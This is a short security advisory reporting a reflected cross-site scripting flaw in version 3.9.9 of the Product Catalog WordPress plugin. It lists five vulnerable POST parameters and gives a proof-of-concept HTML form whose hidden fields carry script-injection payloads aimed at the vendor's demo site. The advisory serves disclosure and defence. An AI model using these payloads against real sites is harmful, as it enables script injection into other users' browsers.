Product Catalog [Reflected XSS]
Description
Plugin registers the shortcodes product-catalogue and product-catalog.
Both of them call the \Insert_Product_Catalog() function that is
responsible for displaying the actual markup on the product catalog
pages. This function doesn’t properly handle user input allowing the
injection of HTML elements in the end result.
Vulnerable params are:
$_POST['current_page']$_POST['categories']$_POST['sub-categories']$_POST['prod_name']$_POST['tags']
The payload is injectable in various frontend catalog pages such as
list view, single product etc. It is also possible through the AJAX
action update_catalogue as described in DWF-2016-87108.
PoC
<form action="http://www.etoilewebdesign.com/ultimate-product-catalogue-demo/" method="post">
<input type="hidden" name="current_page" value="'><script>alert(/current_page/)</script><br" />
<input type="hidden" name="categories" value="'><script>alert(/categories/)</script><br" />
<input type="hidden" name="sub-categories" value="'><script>alert(/sub-categories/)</script><br" />
<input type="hidden" name="tags" value="'><script>alert(/tags/)</script><br" />
<input type="hidden" name="prod_name" value="'><script>alert(/prod_name/)</script><br" />
<input type="submit" id="submit-btn" value="Click Me!" />
</form>
INFO
- 29 July 2016
- Pan Vag
- www.etoilewebdesign.com
- Product Catalog
- 3.9.9
- WordPress 4.5.2
- DWF-2016-87109